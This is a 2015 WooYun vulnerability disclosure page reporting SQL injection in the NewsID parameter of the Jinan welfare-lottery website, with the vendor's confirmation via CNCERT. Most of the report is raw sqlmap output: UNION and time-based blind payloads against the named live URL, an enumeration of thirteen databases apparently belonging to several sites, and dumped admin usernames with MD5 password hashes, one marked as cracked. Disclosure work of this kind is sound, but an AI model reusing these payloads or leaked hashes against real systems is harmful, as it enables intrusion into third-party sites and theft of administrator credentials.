当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117237

漏洞标题:济南福彩网存在SQL注射。导致其他库侧漏

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-06-05 12:08

修复时间:2015-07-25 09:00

公开时间:2015-07-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经确认,细节仅向厂商公开
2015-06-20: 细节向核心白帽子及相关领域专家公开
2015-06-30: 细节向普通白帽子公开
2015-07-10: 细节向实习白帽子公开
2015-07-25: 细节向公众公开

简要描述:

上次是广东de。
这次cmd5解密有账号没钱。 没劲后台

详细说明:

济南福彩网
http://www.jnscp.cn/
http://www.jnscp.cn/detailNews.jsp?NewsID=2645 (GET)

1.png


sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NewsID=2645 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NewsID=2645 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [13]:
[*] caipiaodata
[*] examine
[*] information_schema
[*] jiaoyou
[*] jiuxiang
[*] jnsz
[*] kptest
[*] mysql
[*] test
[*] test2
[*] wenliandata
[*] yyzyhj
[*] zldb


这儿多库
目测只有[*] caipiaodata
才是网站的
其他是其他网站的
具体其他什么网站我还不知道

漏洞证明:

Database: zldb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| news | 52 |
| pic | 8 |
| news_kind | 4 |
| `user` | 1 |
+---------------------------------------+---------+
Database: wenliandata
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| log | 6797 |
| news | 1288 |
| specnews | 53 |
| bigclass | 39 |
| smallclass | 10 |
| specclass | 2 |
| admin | 1 |
| config | 1 |
+---------------------------------------+---------+
Database: jiuxiang
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| shop_area | 3162 |
| shop_city | 345 |
| shop_role_menu | 58 |
| shop_menu | 40 |
| shop_goods_attribute | 39 |
| shop_goods_category | 36 |
| shop_goods | 35 |
| shop_province | 34 |
| shop_order_goods | 32 |
| shop_order | 29 |
| shop_user | 21 |
| shop_user_detail | 21 |
| shop_image | 17 |
| shop_image_type | 15 |
| shop_category | 13 |
| shop_category_big | 13 |
| shop_user_addr | 11 |
| shop_goods_comm | 8 |
| shop_info_type | 7 |
| shop_paytype | 5 |
| sys_param | 5 |
| shop_adminlogin_hist | 4 |
| shop_role | 4 |
| shop_ask | 3 |
| shop_brand | 3 |
| shop_delivery | 3 |
| shop_goodscart | 3 |
| shop_model_attribute | 3 |
| shop_user_grad | 3 |
| shop_admin | 2 |
| shop_categorybig | 2 |
| shop_favorite | 2 |
| shop_info | 1 |
| shop_model | 1 |
| shop_provider | 1 |
| shop_store_in | 1 |
| shop_store_in_detail | 1 |
| system_param | 1 |
+---------------------------------------+---------+
Database: jnsz
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| enterprisedata | 496 |
| enterpriseinfo | 410 |
| sys_menu_role | 320 |
| sys_data_role | 62 |
| sys_dictionary | 54 |
| sys_menu | 35 |
| sys_userrole | 26 |
| sys_user | 22 |
| sys_role | 21 |
| sys_organization | 18 |
| sys_icon | 4 |
| sys_organizationrole | 4 |
| sys_userposition | 2 |
| sys_position | 1 |
| sys_positionrole | 1 |
+---------------------------------------+---------+
Database: jiaoyou
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| hyly | 23883 |
| log | 8276 |
| yyhy | 1519 |
| zxhy | 1056 |
| users | 857 |
| news | 277 |
| ykreg | 256 |
| eventregistration | 114 |
| links | 66 |
| hzhb | 57 |
| hyarea | 17 |
| yyvideo | 10 |
| bigclass | 9 |
| blinddates | 6 |
| yytype | 6 |
| alipay | 5 |
| paytype | 5 |
| message | 4 |
| admin | 1 |
| config | 1 |
+---------------------------------------+---------+
Database: yyzyhj
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| hyly | 15829 |
| log | 7746 |
| yyhy | 1260 |
| zxhy | 1036 |
| users | 840 |
| news | 242 |
| ykreg | 122 |
| eventregistration | 114 |
| hzhb | 57 |
| links | 35 |
| hyarea | 17 |
| yyvideo | 10 |
| bigclass | 9 |
| alipay | 6 |
| blinddates | 6 |
| yytype | 6 |
| paytype | 5 |
| message | 4 |
| admin | 1 |
| config | 1 |
+---------------------------------------+---------+
Database: examine
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| t_examineevaluate | 330771 |
| t_examinescore | 31955 |
| t_examineperson | 13068 |
| employee | 1287 |
| department | 168 |
| t_examinepublish | 91 |
| t_examinecontenta | 39 |
| t_examinecontent | 16 |
| unit | 12 |
| t_employeetype | 8 |
| employee_old | 7 |
| t_examinetable | 7 |
| `position` | 5 |
| t_examineindex | 5 |
| t_examinetype | 3 |
| admin | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2622 |
| STATISTICS | 410 |
| KEY_COLUMN_USAGE | 219 |
| TABLES | 202 |
| TABLE_CONSTRAINTS | 195 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| SCHEMA_PRIVILEGES | 114 |
| USER_PRIVILEGES | 105 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 13 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 724 |
| help_topic | 458 |
| help_keyword | 378 |
| help_category | 36 |
| `user` | 9 |
| db | 8 |
+---------------------------------------+---------+
Database: kptest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| t_examineevaluate | 162681 |
| t_examineperson | 4219 |
| t_examinescore | 192 |
| t_examinecontenta | 37 |
| t_employeetype | 8 |
| t_examinecontent | 8 |
| t_examinetable | 8 |
| employee_old | 7 |
| `position` | 5 |
| t_examineindex | 5 |
| department | 3 |
| employee | 3 |
| t_examinepublish | 3 |
| t_examinetype | 3 |
| admin | 2 |
| unit | 1 |
+---------------------------------------+---------+
Database: caipiaodata
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| log | 6497 |
| news | 2533 |
| message | 164 |
| bigclass | 22 |
| admin | 2 |
| config | 1 |
+---------------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NewsID=2645 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: kptest
Table: admin
[6 columns]
+----------------+-------------+
| Column | Type |
+----------------+-------------+
| adminId | int(4) |
| adminLoginIP | varchar(30) |
| adminLoginTime | varchar(30) |
| adminName | varchar(50) |
| adminPwd | varchar(50) |
| role | varchar(10) |
+----------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NewsID=2645 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: kptest
Table: admin
[2 entries]
+--------------------------------------+-----------+
| adminPwd | adminName |
+--------------------------------------+-----------+
| C4CA4238A0B923820DCC509A6F75849B (1) | admin |
| 3069C374C533AE8D7928DA242B6A9825 | 寮犱笁 |
+--------------------------------------+-----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsID (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NewsID=2645 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: caipiaodata
Table: admin
[18 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| AddTime | varchar(20) |
| AdminID | int(11) |
| AdminName | varchar(32) |
| AdminPwd | varchar(64) |
| AdminType | smallint(6) |
| LastLoginIP | varchar(50) |
| LastLoginTime | varchar(50) |
| LoginNum | int(11) |
| NewsNum | int(11) |
| UserAddress | varchar(80) |
| UserBirthday | varchar(10) |
| UserEmail | varchar(50) |
| UserInfo | longtext |
| UserName | varchar(20) |
| UserQQ | varchar(10) |
| UserSex | char(2) |
| UserTel | varchar(50) |
| UserZip | varchar(6) |
+---------------+-------------+


caipiaodata

UserName,AdminPwd
admin,31461AB060AFBB91E561047381356F5B
啊啊啊啊,31461AB060AFBB91E561047381356F5B


kptest

adminPwd,adminName
C4CA4238A0B923820DCC509A6F75849B (1),admin
3069C374C533AE8D7928DA242B6A9825,张三

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-10 08:58

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.

最新状态:

暂无